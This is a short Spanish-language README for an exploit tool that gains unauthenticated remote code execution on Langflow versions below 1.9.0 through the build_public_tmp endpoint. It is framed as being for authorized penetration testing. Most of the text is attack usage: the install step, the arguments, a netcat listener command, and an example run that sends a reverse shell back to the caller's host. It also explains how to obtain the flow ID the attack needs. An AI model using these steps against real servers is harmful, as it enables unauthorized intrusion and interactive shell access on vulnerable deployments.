
Exploit para ejecución remota de código no autenticada en Langflow <1.9.0 a través del endpoint build_public_tmp, que entrega una shell inversa para pruebas de penetración autorizadas.
Ejecución remota de código para Langflow a través del endpoint build_public_tmp.
Explotación a través del endpoint público de construcción de flujo que ejecuta una reverse shell en el objetivo.
httpxInstalación:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : URL base de la instancia de Langflow (ej., https://flow.example.com/)-l, --lhost : Tu dirección IP para recibir la reverse shell-p, --lport : Puerto de escucha para la reverse shell-f --flow-id : ID del flujo objetivo (requerido – obtener de /api/v1/flows/ o de la interfaz)-c --client-id : Valor de la cookie client_id para identificación de sesiónInicia un listener:
nc -nlvp 9001
Ejecuta el exploit:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
Si tiene éxito, obtienes un shell bash interactivo.
flow-id válido. Lista todos los flujos mediante GET /api/v1/flows o cópialo desde la URL del navegador.MIT – para investigación de seguridad educativa y ética.